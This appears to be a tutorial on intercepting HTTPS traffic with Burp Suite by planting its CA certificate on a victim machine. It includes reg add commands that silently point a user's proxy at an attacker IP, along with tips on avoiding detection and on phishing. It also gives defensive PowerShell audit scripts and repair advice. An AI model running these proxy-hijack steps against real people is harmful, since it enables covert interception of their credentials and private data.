Man-in-the-middle attack hijacking HTTPS plaintext data

Source: Internet
Author: User
Tags: ssl certificate

Secure transmission of sensitive data is an important part of network security, and most people regard HTTPS as the best practice. Leaving aside the price of an SSL certificate, HTTPS is at least not absolutely secure: a man-in-the-middle hijacking attack can still obtain the transmitted plaintext. The attack principle is described in "HTTPS connection process and man-in-the-middle attack hijacking", but that article also notes that a man-in-the-middle attack requires the client to trust the middleman's certificate, otherwise the attack fails. This makes the attack difficult and inconvenient, but not impossible. I believe there are at least two ways to exploit it:
First, after obtaining Remote Desktop logon rights on the server, configure the client on it to trust the middleman's certificate.
Second, use physical access: get hold of the victim's computer and configure it to trust the man-in-the-middle certificate.

1.1.1 Setting up the Client Trust middleman certificate

The middleman here is Burp Suite, which we use to carry out the HTTPS hijacking attack. First the client (the victim's computer) must trust the Burp Suite certificate, that is, the Burp Suite CA certificate must be installed; the procedure is described in the official Burp Suite documentation.

1.1.2 Attack conditions

On reflection we found that this approach has certain limitations; let us be clear that the technique alone is not enough. The attack conditions are mainly the following:
First, the server needs to be a Windows host.
Second, the attacker needs a separate external host (or a host on the same LAN).
Third, the attacker needs Remote Desktop control of the server, or temporary possession of the victim's computer.
Regarding the third condition, a brief explanation: Remote Desktop control of the server by itself does not give access to the application's sensitive data or to the data in the database. For example, you have found a command execution vulnerability in a site (with only a login page); you can execute commands, but with low privileges (even with high privileges the situation is the same). Unless you are only interested in controlling the server and not in the sensitive data in the application, this attack mode is useful now.

1.1.3 Introduction to the experimental environment

Operating system: Microsoft Windows Server R2 Enterprise, IP: 192.168.1.25
User rights group: Users
Tool used: Burp Suite
Attacker IP: 192.168.1.200

1.1.4 Configuring Attackers Burpsuite

Since we want to capture the packets sent by the victim, and the victim is usually on an intranet whose external access is mostly provided through port mapping, we configure our Burp Suite proxy listener to accept packets from any IP, as shown in the figure:

1.1.5 set the attacker's IE proxy

If you can reach the desktop environment, you can set the IE proxy through the graphical interface, as shown in the figure:

If you cannot reach the Remote Desktop, the following commands set the IE proxy:

REM Enable the proxy
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 1 /f

REM Set the proxy IP and port: the attacker's IP, with the port matching the Burp Suite listener
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /t REG_SZ /d "192.168.1.200:8080" /f

REM To turn the configured proxy off again, use the following command:
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 0 /f

The above commands have been tested: they execute successfully for any account in the Users group, as shown in the figure. For convenience we write the enable and disable commands as two separate .bat batch files.
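Because the values above live under HKCU, every user profile carries its own proxy configuration, and a low-privilege account can change its own without any prompt. The following PowerShell script is an added example for the defending side, not code from the original article: it walks every loaded user hive under HKEY_USERS and reports profiles whose WinINET proxy is enabled and pointed somewhere other than the sanctioned proxy, or which have a PAC file configured. The variable name $sanctionedProxy and the assumption that the host should normally have no user proxy are mine.

```powershell
# Added example, not from the original article: audit the per-user WinINET proxy settings
# that "reg add ... Internet Settings" changes, across every loaded user profile.
# Assumption: the host should have no user-level proxy ($sanctionedProxy = '');
# set it to the organisation's proxy as "host:port" if one is expected.
$sanctionedProxy = ''
$keyRel = 'Software\Microsoft\Windows\CurrentVersion\Internet Settings'

$findings = foreach ($hive in Get-ChildItem -Path 'Registry::HKEY_USERS') {
    # Real user profiles are S-1-5-21-... SIDs; skip *_Classes hives, .DEFAULT and service SIDs
    if ($hive.PSChildName -notmatch '^S-1-5-21-\d+-\d+-\d+-\d+$') { continue }

    $path = "Registry::$($hive.Name)\$keyRel"
    if (-not (Test-Path -Path $path)) { continue }
    $p = Get-ItemProperty -Path $path

    # Resolve the SID to an account name where possible; fall back to the raw SID
    try {
        $sid = [System.Security.Principal.SecurityIdentifier]$hive.PSChildName
        $account = $sid.Translate([System.Security.Principal.NTAccount]).Value
    } catch {
        $account = $hive.PSChildName
    }

    $enabled = [int]$p.ProxyEnable        # missing value casts to 0 (proxy off)
    $server  = [string]$p.ProxyServer     # e.g. "192.168.1.200:8080"
    $pac     = [string]$p.AutoConfigURL   # a PAC URL redirects traffic just as effectively

    if (($enabled -eq 1 -and $server -ne $sanctionedProxy) -or $pac) {
        [pscustomobject]@{
            Account       = $account
            ProxyEnable   = $enabled
            ProxyServer   = $server
            AutoConfigURL = $pac
        }
    }
}

if ($findings) {
    Write-Warning 'Per-user proxy settings that do not match the sanctioned configuration:'
    $findings | Format-Table -AutoSize
} else {
    Write-Output 'No unexpected per-user proxy settings found.'
}
```

Run it from an elevated PowerShell so that other users' hives are readable. HKEY_USERS only contains the hives of profiles that are currently loaded, so for logged-off users the same key would have to be checked after loading their NTUSER.DAT; a scheduled run at user logon covers the common case. A ProxyServer value on a server that points at another workstation, as in the scenario above, is the finding to act on.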

1.1.6 obtaining the plaintext data after hijacking

So as not to arouse the victim's suspicion, we do not turn on Burp's Intercept function, as shown in the figure:

Now the attacker only needs to wait for the victim to use the browser to visit the relevant website; even for an HTTPS site we can hijack the plaintext data, as shown in the figure:

1.1.7 Summary and Repair suggestions

In addition, if the site is plain HTTP, the attack becomes much easier and the harm much greater, because the step of making the client trust the middleman's certificate is not needed; only the client's proxy has to be set, and that can be done by phishing (distributing a tool that enables the proxy) or with a simple command executed from a shell with normal user privileges. The recommended fixes are as follows:
First, harden the server to prevent server vulnerabilities from being used for attacks.
Second, configure browsers not to use the default system proxy (the IE global proxy).
Third, raise security awareness: when leaving your computer remember to lock the screen with a password, stay nearby when lending your computer to others, and check for anything abnormal after they are done.
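The HTTPS variant of this attack only works because a foreign CA certificate was planted in the trust store, so the complementary check on the defending side is to watch that store. The PowerShell script below is an added example and not part of the original article: it compares the Trusted Root stores of the machine and the current user against a baseline of known-good thumbprints and lists anything else, newest first, which is where an interception CA installed recently would appear. The baseline list is a placeholder to be filled from a known-good host.

```powershell
# Added example, not from the original article: report root certificates that are not in a
# baseline allow-list, so that a CA installed to enable interception stands out.
# Assumption: $baselineThumbprints is exported from a known-good machine; the value below is a placeholder.
$baselineThumbprints = @(
    'PLACEHOLDER_THUMBPRINT_FROM_KNOWN_GOOD_HOST'
)

# The current-user Root view also mirrors the machine roots, so dedupe by thumbprint
$stores = @('Cert:\LocalMachine\Root', 'Cert:\CurrentUser\Root')
$seen = @{}

$unexpected = foreach ($store in $stores) {
    foreach ($cert in Get-ChildItem -Path $store -ErrorAction SilentlyContinue) {
        if ($seen.ContainsKey($cert.Thumbprint)) { continue }
        $seen[$cert.Thumbprint] = $true
        if ($baselineThumbprints -notcontains $cert.Thumbprint) {
            [pscustomobject]@{
                Store      = $store
                Subject    = $cert.Subject
                NotBefore  = $cert.NotBefore
                Thumbprint = $cert.Thumbprint
            }
        }
    }
}

if ($unexpected) {
    Write-Warning "$(@($unexpected).Count) root certificate(s) not in the baseline:"
    $unexpected | Sort-Object -Property NotBefore -Descending | Format-Table -AutoSize
} else {
    Write-Output 'Trusted Root stores match the baseline.'
}
```

Windows adds genuine roots over time through its automatic root update, so expect a small amount of drift and refresh the baseline deliberately rather than silencing the check. A root with a very recent NotBefore date and a subject that names a proxy or testing tool rather than a public CA is the case this script is meant to surface.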
